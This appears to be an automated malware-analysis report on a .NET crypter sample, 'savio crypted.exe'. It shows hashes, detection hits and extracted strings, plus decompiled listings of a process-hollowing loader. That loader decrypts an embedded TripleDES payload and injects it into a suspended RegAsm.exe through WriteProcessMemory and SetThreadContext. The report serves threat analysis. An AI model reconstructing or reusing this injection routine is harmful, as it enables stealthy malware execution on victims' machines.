File Information hashes and primary classification
File name
4
File size
361.0 KiB
Architecture
DOTNET
MD5
15fffb2ca22665c1d04731a250513f5c
SHA1
6a187370998da0095ffa6c4f8dfe094d501bdc65
SHA256
674f19126e6dcf0ebb2bf9944841c4cd43195f73b006d51826c7c4252a7e2122
TLSH
T1577428343dfa501ab173ef698be479aada6fb7733b07645d1090038a4713a41ee8153e
Imphash
f34d5f2d4577ed6d9ceec516c1f5a744
Rich header
-
Metadata parser-extracted fields
YARA Signatures 2 matching rules

Type.INFO

compiler
MSVC_2012_linker
language
DotNet
Kesakode similarity verdict
SolarMarker
4.5%
KingBong
0.2%
ZeusSphinx
0.2%
1 malware hits 0 library hits 139 clean hits
Anomalies signals worth reviewing
strings: BigStringHiScore HugeStringBase64 StringBase64 VeryHugeString
imports: DotnetCryptoApiUsage ExternalModule NativeMethods
integrity: NoChecksum
Constants identified constants and patterns
No known constants identified.
Strings highest-value extracted strings
Kesakode
196
Malware 1 Library 0 Unknown 57 Clean 138
AddressStringRefsEncodingScore
0x403371 fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6... 1 UTF16 210
0x403315 iA9B1uKFddQdqiLSSuzvD2GhL1o2Jv+v 1 UTF16 187
0x403357 b2CBFvcQeV4= 1 UTF16 166
0x45A38E RegAsm.exe 1 UTF16 154
0x402F80 ntdll.dll 1 UTF8 152
0x45A3A4 Process creation failed. 1 UTF16 147
0x402F73 kernel32.dll 1 UTF8 146
0x45A44C SetThreadContext failed 1 UTF16 145
0x45A3F4 Failed to read memory 1 UTF16 145
0x45A420 VirtualAllocEx failed 1 UTF16 142
0x402FD7 DebuggerStepThroughAttribute 1 UTF8 142
0x402F14 CompilationRelaxationsAttribute 1 UTF8 141
0x402B66 savio crypted.exe 1 UTF8 141
0x402F34 RuntimeCompatibilityAttribute 1 UTF8 140
0x402EC9 SecurityPermissionAttribute 1 UTF8 139
0x4030C3 DebuggerHiddenAttribute 1 UTF8 139
0x4030DB AsyncStateMachineAttribute 1 UTF8 138
0x40328A CompilerGeneratedAttribute 1 UTF8 137
0x4032F7 UnverifiableCodeAttribute 1 UTF8 136
0x4032A5 StructLayoutAttribute 1 UTF8 135
0x403064 RuntimeEnvironment 1 UTF8 135
0x45A3D6 Context failed 1 UTF16 133
0x402EAD System.Security.Permissions 2 UTF8 133
0x4032C6 MarshalAsAttribute 1 UTF8 133
0x402EA2 FHJASDFJHA 1 UTF8 133
0x402EF4 System.Runtime.CompilerServices 7 UTF8 132
0x402DCA System.Runtime.InteropServices 8 UTF8 132
0x402C6D System.Threading.Tasks 1 UTF8 132
0x402D3F lpProcessAttributes 1 UTF8 132
0x403077 GetRuntimeDirectory 1 UTF8 132
0x403197 CreateDecryptor 1 UTF8 132
0x402E71 baseAddress 1 UTF8 132
0x402D94 lpCurrentDirectory 1 UTF8 131
0x403002 IAsyncStateMachine 1 UTF8 131
0x402F60 DllImportAttribute 1 UTF8 131
0x403138 SymmetricAlgorithm 1 UTF8 131
0x402D1F lpApplicationName 1 UTF8 131
0x402DE9 OutAttribute 1 UTF8 131
0x403111 System.Security.Cryptography 7 UTF8 130
0x402E46 lpNumberOfBytesWritten 1 UTF8 130
0x402DB5 lpProcessInformation 1 UTF8 130
0x402D53 lpThreadAttributes 1 UTF8 129
0x4031C8 CryptoStreamMode 1 UTF8 129
0x4032E7 System.Security 1 UTF8 129
0x402E97 targetPath 1 UTF8 129
0x402CE2 hStdOutput 1 UTF8 129
0x4031A7 MemoryStream 1 UTF8 128
0x403226 BitConverter 1 UTF8 128
0x403039 AsyncTaskMethodBuilder 1 UTF8 127
0x403186 ICryptoTransform 1 UTF8 127
0x402E11 flAllocationType 1 UTF8 127
0x4031DF FlushFinalBlock 1 UTF8 127
0x402EE5 SecurityAction 1 UTF8 127
0x4032D9 UnmanagedType 1 UTF8 127
0x402C99 InjectProcess 1 UTF8 127
0x403265 GetBytes 1 UTF8 127
0x40301E SetStateMachine 3 UTF8 126
0x4030B9 SetResult 1 UTF8 126
0x402E00 lpAddress 1 UTF8 126
0x402CED hStdError 1 UTF8 126
0x402FBA GetResult 1 UTF8 126
0x403285 Kill 1 UTF8 126
0x402E92 data 1 UTF8 126
0x402E5D lpNumberOfBytesRead 1 UTF8 125
0x402C28 WriteProcessMemory 2 UTF8 125
0x403276 GetProcessById 1 UTF8 125
0x402DA7 lpStartupInfo 1 UTF8 125
0x402FF4 <RunStub>d__0 1 UTF8 125
0x402D31 lpCommandLine 1 UTF8 125
0x402B78 NativeMethods 1 UTF8 125
0x402D86 lpEnvironment 1 UTF8 125
0x4030AC SetException 1 UTF8 125
0x4031B4 CryptoStream 1 UTF8 125
0x402D08 dwProcessId 1 UTF8 125
0x402CCC lpReserved2 1 UTF8 125
0x40316E PaddingMode 1 UTF8 125
0x402BAF ProcessInfo 1 UTF8 125
0x402D14 dwThreadId 1 UTF8 125
0x402FAF GetAwaiter 1 UTF8 125
0x402CAA lpReserved 1 UTF8 125
0x40302E <>1__state 1 UTF8 125
0x402D66 bInheritHandles 1 UTF8 124
0x403102 Start 1 UTF8 124
0x403255 Array 1 UTF8 124
0x402C3B ReadProcessMemory 2 UTF8 123
0x40326E Process 1 UTF8 123
0x40314B set_Key 1 UTF8 123
0x402CBF lpTitle 1 UTF8 123
0x4031EF ToArray 1 UTF8 123
0x403203 Dispose 1 UTF8 123
0x40320B Marshal 1 UTF8 123
0x402C89 RunStub 1 UTF8 123
0x402B9B Program 1 UTF8 123
0x40305D param0 1 UTF8 123
0x40321A IntPtr 1 UTF8 123
0x40324E Buffer 1 UTF8 123
0x402F92 FromBase64String 1 UTF8 122
0x402D76 dwCreationFlags 1 UTF8 122
0x402BDC CreateProcess 2 UTF8 122
0x402E2C lpBaseAddress 2 UTF8 122
0x403050 <>t__builder 1 UTF8 122
0x402FA3 TaskAwaiter 1 UTF8 122
0x40317A set_Padding 1 UTF8 122
0x4031F7 IDisposable 1 UTF8 122
0x402BA3 StartupInfo 1 UTF8 122
0x40315A CipherMode 1 UTF8 122
0x40325B BlockCopy 1 UTF8 122
0x402BD2 ValueType 1 UTF8 122
0x402CB5 lpDesktop 1 UTF8 122
0x402CD8 hStdInput 1 UTF8 122
0x402E22 flProtect 1 UTF8 122
0x403165 set_Mode 1 UTF8 122
0x402FC4 System.Diagnostics 3 UTF8 121
0x402BF7 GetThreadContext 2 UTF8 121
0x402C08 SetThreadContext 2 UTF8 121
0x402C4D NtUnmapViewOfSection 2 UTF8 120
0x402B86 ProcessHollowingStub 4 UTF8 120
0x4032BB LayoutKind 1 UTF8 118
0x40312E TripleDES 1 UTF8 118
0x4030A2 Exception 1 UTF8 118
0x403108 get_Task 1 UTF8 118
0x402B5D <Module> 1 UTF8 118
0x402BBB mscorlib 1 UTF8 118
0x402C19 VirtualAllocEx 2 UTF8 117
0x402E7D base64Payload 2 UTF8 117
0x402BEA ResumeThread 2 UTF8 117
0x403233 ToInt32 1 UTF8 117
0x403241 ToInt16 1 UTF8 117
0x402F8A Convert 1 UTF8 117
0x402C91 Decrypt 1 UTF8 117
0x40309A Combine 1 UTF8 117
0x402BCB Object 1 UTF8 117
0x403153 set_IV 1 UTF8 117
0x4031C1 Stream 1 UTF8 117
0x4031D9 Write 1 UTF8 117
0x40323B Int32 1 UTF8 117
0x45D453 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifes... 0 ASCII 116
0x402F52 savio crypted 1 UTF8 116
0x402CC7 misc 1 UTF8 116
0x403249 Byte 1 UTF8 116
0x402C68 Main 1 UTF8 116
0x402C84 Task 1 UTF8 116
0x403221 Zero 1 UTF8 116
0x403095 Path 1 UTF8 116
0x4030F6 Type 1 UTF8 116
0x402CA7 cb 1 UTF8 116
0x45A75E mscoree.dll 1 ASCII 115
0x402D00 hThread 4 UTF8 115
0x402E3A buffer 2 UTF8 115
0x4030FB Create 2 UTF8 115
0x402DF6 lpContext 2 UTF8 114
0x403015 MoveNext 2 UTF8 114
0x402CF7 hProcess 5 UTF8 114
0x403213 SizeOf 1 UTF8 111
0x402E0A dwSize 1 UTF8 111
0x40308B System.IO 3 UTF8 110
0x402BC4 System 13 UTF8 109
0x402C62 .ctor 18 UTF8 109
0x402E8B key 3 UTF8 108
0x402E8F iv 3 UTF8 108
0x45A67F System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b... 0 ASCII 102
0x402E41 size 2 UTF8 99
0x4024D8 BSJB 1 ASCII 97
0x45C288 savio crypted.exe 0 UTF16 88
0x45C2FC savio crypted.exe 0 UTF16 88
0x45C1FA 000004b0 0 UTF16 83
0x45C136 VS_VERSION_INFO 0 UTF16 81
0x45C2DA OriginalFilename 0 UTF16 80
0x45C258 0.0.0.0 0 UTF16 80
0x45C344 0.0.0.0 0 UTF16 80
0x45C37C 0.0.0.0 0 UTF16 80
0x45A563 *ProcessHollowingStub.Program+<RunStub>d__0 0 ASCII 74
0x45C212 FileDescription 0 UTF16 73
0x45C26E InternalName 0 UTF16 73
0x45C35A Assembly Version 0 UTF16 71
0x45C1D6 StringFileInfo 0 UTF16 71
0x45C326 ProductVersion 0 UTF16 71
- !This program cannot be run in DOS mode.\r\r\n$ 0 ASCII 70
0x45C23E FileVersion 0 UTF16 70
0x45C1B2 Translation 0 UTF16 70
0x45C2B2 LegalCopyright 0 UTF16 68
0x45A662 WrapNonExceptionThrows 0 ASCII 65
0x45C192 VarFileInfo 0 UTF16 64
0x4024E8 v4.0.30319 0 ASCII 64
0x45A708 SkipVerification 0 ASCII 62
- .text 0 ASCII 59
- `.rsrc 0 ASCII 58
0x45A752 _CorExeMain 0 ASCII 53
- @.reloc 0 ASCII 52
0x403313 0 UTF8 50
0x403312 0 UTF8 50
0x403311 0 UTF8 50
0x40250C #Strings 0 ASCII 48
0x40253C #Blob 0 ASCII 44
0x40252C #GUID 0 ASCII 44
0x4026FA S* \n 0 UTF16 41
Functions high-value functions
Kesakode
8
Malware 0 Library 0 Unknown 7 Clean 1
Function listings
0x402250 InjectProcess str 5 api 0 imm 21 Unknown
void ProcessHollowingStub.Program.InjectProcess(string targetPath, byte[] FHJASDFJHA) {
    ldloca.s     local0
    initobj      ProcessHollowingStub.ProcessInfo
    ldc.i4       0x0
    stloc        local1
    br           .13
.1:
    ldloca.s     local2
    initobj      ProcessHollowingStub.StartupInfo
    ldloca.s     local2
    ldloc        local2
    call         System.Runtime.InteropServices.Marshal.SizeOf
    stfld        ProcessHollowingStub.StartupInfo.cb
    ldarg        targetPath
    ldnull      
    ldsfld       [System.IntPtr.Zero]
    ldsfld       [System.IntPtr.Zero]
    ldc.i4       0x0
    ldc.i4       0x8000004
    ldsfld       [System.IntPtr.Zero]
    ldnull      
    ldloca.s     local2
    ldloca.s     local0
    call         [kernel32.CreateProcess]
    stloc        local3
    ldloc        local3
    brtrue.s     .2
    ldstr        "Process creation failed."
    newobj       [System.Exception.ctor]
    throw       
.2:
    ldarg        FHJASDFJHA
    ldc.i4       0x3c
    call         [System.BitConverter.ToInt32]
    stloc.s      local4
    ldarg        FHJASDFJHA
    ldloc.s      local4
    ldc.i4       0x34
    add         
    call         [System.BitConverter.ToInt32]
    stloc.s      local5
    ldc.i4       0xb3
    newarr       System.Int32
    stloc.s      local6
    ldloc.s      local6
    ldc.i4       0x0
    ldc.i4       0x10002
    stelem.i4   
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hThread
    ldloc.s      local6
    call         [kernel32.GetThreadContext]
    brtrue.s     .3
    ldstr        "Context failed"
    newobj       [System.Exception.ctor]
    throw       
.3:
    ldc.i4       0x0
    stloc.s      local7
    ldc.i4       0x0
    stloc.s      local8
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hProcess
    ldloc.s      local6
    ldc.i4       0x29
    ldelem.i4   
    ldc.i4       0x8
    add         
    ldloca.s     local7
    ldc.i4       0x4
    ldloca.s     local8
    call         [kernel32.ReadProcessMemory]
    brtrue.s     .4
    ldstr        "Failed to read memory"
    newobj       [System.Exception.ctor]
    throw       
.4:
    ldloc.s      local7
    ldloc.s      local5
    bne.un.s     .5
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hProcess
    ldloc.s      local7
    call         [ntdll.NtUnmapViewOfSection]
    pop         
.5:
    ldarg        FHJASDFJHA
    ldloc.s      local4
    ldc.i4       0x50
    add         
    call         [System.BitConverter.ToInt32]
    stloc.s      local9
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hProcess
    ldloc.s      local5
    ldloc.s      local9
    ldc.i4       0x3000
    ldc.i4       0x40
    call         [kernel32.VirtualAllocEx]
    stloc.s      local10
    ldloc.s      local10
    brtrue.s     .6
    ldstr        "VirtualAllocEx failed"
    newobj       [System.Exception.ctor]
    throw       
.6:
    ldc.i4       0x0
    stloc.s      local11
    ldarg        FHJASDFJHA
    ldloc.s      local4
    ldc.i4       0x54
    add         
    call         [System.BitConverter.ToInt32]
    stloc.s      local12
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hProcess
    ldloc.s      local10
    ldarg        FHJASDFJHA
    ldloc.s      local12
    ldloca.s     local11
    call         [kernel32.WriteProcessMemory]
    pop         
    ldarg        FHJASDFJHA
    ldloc.s      local4
    ldc.i4       0x6
    add         
    call         [System.BitConverter.ToInt16]
    stloc.s      local13
    ldloc.s      local4
    ldc.i4       0xf8
    add         
    stloc.s      local14
    ldc.i4       0x0
    stloc.s      local15
    br.s         .9
.7:
    ldarg        FHJASDFJHA
    ldloc.s      local14
    ldc.i4       0xc
    add         
    call         [System.BitConverter.ToInt32]
    stloc.s      local16
    ldarg        FHJASDFJHA
    ldloc.s      local14
    ldc.i4       0x10
    add         
    call         [System.BitConverter.ToInt32]
    stloc.s      local17
    ldarg        FHJASDFJHA
    ldloc.s      local14
    ldc.i4       0x14
    add         
    call         [System.BitConverter.ToInt32]
    stloc.s      local18
    ldloc.s      local17
    brzero.s     .8
    ldloc.s      local17
    newarr       System.Byte
    stloc.s      local19
    ldarg        FHJASDFJHA
    ldloc.s      local18
    ldloc.s      local19
    ldc.i4       0x0
    ldloc.s      local17
    call         [System.Buffer.BlockCopy]
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hProcess
    ldloc.s      local10
    ldloc.s      local16
    add         
    ldloc.s      local19
    ldloc.s      local17
    ldloca.s     local11
    call         [kernel32.WriteProcessMemory]
    pop         
.8:
    ldloc.s      local14
    ldc.i4       0x28
    add         
    stloc.s      local14
    ldloc.s      local15
    ldc.i4       0x1
    add         
    stloc.s      local15
.9:
    ldloc.s      local15
    ldloc.s      local13
    blt.s        .7
    ldloc.s      local10
    call         [System.BitConverter.GetBytes]
    stloc.s      local20
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hProcess
    ldloc.s      local6
    ldc.i4       0x29
    ldelem.i4   
    ldc.i4       0x8
    add         
    ldloc.s      local20
    ldc.i4       0x4
    ldloca.s     local11
    call         [kernel32.WriteProcessMemory]
    pop         
    ldarg        FHJASDFJHA
    ldloc.s      local4
    ldc.i4       0x28
    add         
    call         [System.BitConverter.ToInt32]
    stloc.s      local21
    ldloc.s      local6
    ldc.i4       0x2c
    ldloc.s      local10
    ldloc.s      local21
    add         
    stelem.i4   
    ldloca.s     local0
    ldfld        ProcessHollowingStub.ProcessInfo.hThread
    ldloc.s      local6
    call         [kernel32.SetThreadContext]
    brtrue.s     .10
; listing truncated
0x402064 DotNetEntryPoint str 3 api 5 imm 0 Unknown
void DotNetEntryPoint() {
    ldstr        "iA9B1uKFddQdqiLSSuzvD2GhL1o2Jv+v"
    call         [System.Convert.FromBase64String]
    stloc        local0
    ldstr        "b2CBFvcQeV4="
    call         [System.Convert.FromBase64String]
    stloc        local1
    ldstr        "fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGe..c7KJLdW7aAgICsJ0QOkQU76195y+7NA="
    stloc        local2
    ldloc        local2
    ldloc        local0
    ldloc        local1
    call         System.Threading.Tasks.Task ProcessHollowingStub.Program.RunStub(string base64Payload, byte[] key, byte[] iv)
    callvirt     [System.Threading.Tasks.Task.GetAwaiter]
    stloc        local3
    ldloca.s     local3
    call         [System.Runtime.CompilerServices.TaskAwaiter.GetResult]
    ret         
}
0x4020A4 MoveNext str 1 api 2 imm 4 Unknown
void ProcessHollowingStub.Program.<RunStub>d__0.MoveNext(ProcessHollowingStub.Program.<RunStub>d__0 this) {
    ldc.i4       0x1
    stloc        local2
    ldarg        this
    ldfld        ProcessHollowingStub.Program.<RunStub>d__0.base64Payload
    call         [System.Convert.FromBase64String]
    ldarg        this
    ldfld        ProcessHollowingStub.Program.<RunStub>d__0.key
    ldarg        this
    ldfld        ProcessHollowingStub.Program.<RunStub>d__0.iv
    call         byte[] ProcessHollowingStub.Program.Decrypt(byte[] data, byte[] key, byte[] iv)
    stloc        local0
    ldloc        local0
    brtrue.s     .1
    leave.s      .2
.1:
    call         [System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory]
    ldstr        "RegAsm.exe"
    call         [System.IO.Path.Combine]
    stloc        local1
    ldloc        local1
    ldloc        local0
    call         void ProcessHollowingStub.Program.InjectProcess(string targetPath, byte[] FHJASDFJHA)
    leave.s      .2
    stloc        local3
    ldarg        this
    ldc.i4       -0x2
    stfld        ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
    ldarg        this
    ldflda       ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
    ldloc        local3
    call         [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetException]
    leave.s      .3
.2:
    ldarg        this
    ldc.i4       -0x2
    stfld        ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
    ldarg        this
    ldflda       ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
    call         [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetResult]
.3:
    ret         
}
0x402190 Decrypt str 0 api 2 imm 3 Unknown
byte[] ProcessHollowingStub.Program.Decrypt(byte[] data, byte[] key, byte[] iv) {
    call         [System.Security.Cryptography.TripleDES.Create]
    stloc        local0
    ldloc        local0
    ldarg        key
    callvirt     [System.Security.Cryptography.SymmetricAlgorithm.set_Key]
    ldloc        local0
    ldarg        iv
    callvirt     [System.Security.Cryptography.SymmetricAlgorithm.set_IV]
    ldloc        local0
    ldc.i4       0x1
    callvirt     [System.Security.Cryptography.SymmetricAlgorithm.set_Mode]
    ldloc        local0
    ldc.i4       0x2
    callvirt     [System.Security.Cryptography.SymmetricAlgorithm.set_Padding]
    ldloc        local0
    callvirt     [System.Security.Cryptography.SymmetricAlgorithm.CreateDecryptor]
    stloc        local1
    newobj       [System.IO.MemoryStream.ctor]
    stloc        local2
    ldloc        local2
    ldloc        local1
    ldc.i4       0x1
    newobj       [System.Security.Cryptography.CryptoStream.ctor]
    stloc        local3
    ldloc        local3
    ldarg        data
    ldc.i4       0x0
    ldarg        data
    ldlen       
    conv.i4     
    callvirt     [System.IO.Stream.Write]
    ldloc        local3
    callvirt     [System.Security.Cryptography.CryptoStream.FlushFinalBlock]
    ldloc        local2
    callvirt     [System.IO.MemoryStream.ToArray]
    stloc.s      local4
    leave.s      .5
    ldloc        local3
    brzero.s     .1
    ldloc        local3
    callvirt     [System.IDisposable.Dispose]
.1:
    endfinally  
    ldloc        local2
    brzero.s     .2
    ldloc        local2
    callvirt     [System.IDisposable.Dispose]
.2:
    endfinally  
    ldloc        local1
    brzero.s     .3
    ldloc        local1
    callvirt     [System.IDisposable.Dispose]
.3:
    endfinally  
    ldloc        local0
    brzero.s     .4
    ldloc        local0
    callvirt     [System.IDisposable.Dispose]
.4:
    endfinally  
.5:
    ldloc.s      local4
    ret         
}
0x402051 ctor str 0 api 1 imm 0 Unknown
void ProcessHollowingStub.NativeMethods.ctor(ProcessHollowingStub.NativeMethods this) {
    ldarg        this
    call         [System.Object.ctor]
    ret         
}
0x40211D SetStateMachine str 0 api 1 imm 0 Unknown
void ProcessHollowingStub.Program.<RunStub>d__0.SetStateMachine(ProcessHollowingStub.Program.<RunStub>d__0 this, System.Runtime.CompilerServices.IAsyncStateMachine, ) {
    ldarg        this
    ldflda       ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
    ldarg        arg0
    call         [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.SetStateMachine]
    ret         
}
0x4024D1 ctor str 0 api 0 imm 0 Unknown
void ProcessHollowingStub.Program.ctor(ProcessHollowingStub.Program this) {
    ldarg        this
    call         void ProcessHollowingStub.NativeMethods.ctor(ProcessHollowingStub.NativeMethods this)
    ret         
}
0x402138 RunStub str 0 api 3 imm 1 Clean
System.Threading.Tasks.Task ProcessHollowingStub.Program.RunStub(string base64Payload, byte[] key, byte[] iv) {
    ldloca.s     local0
    ldarg        base64Payload
    stfld        ProcessHollowingStub.Program.<RunStub>d__0.base64Payload
    ldloca.s     local0
    ldarg        key
    stfld        ProcessHollowingStub.Program.<RunStub>d__0.key
    ldloca.s     local0
    ldarg        iv
    stfld        ProcessHollowingStub.Program.<RunStub>d__0.iv
    ldloca.s     local0
    call         [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Create]
    stfld        ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
    ldloca.s     local0
    ldc.i4       -0x1
    stfld        ProcessHollowingStub.Program.<RunStub>d__0.<>1__state
    ldloca.s     local0
    ldfld        ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
    stloc        local1
    ldloca.s     local1
    ldloca.s     local0
    call         System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Start
    ldloca.s     local0
    ldflda       ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
    call         [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.get_Task]
    ret         
}
No library functions identified.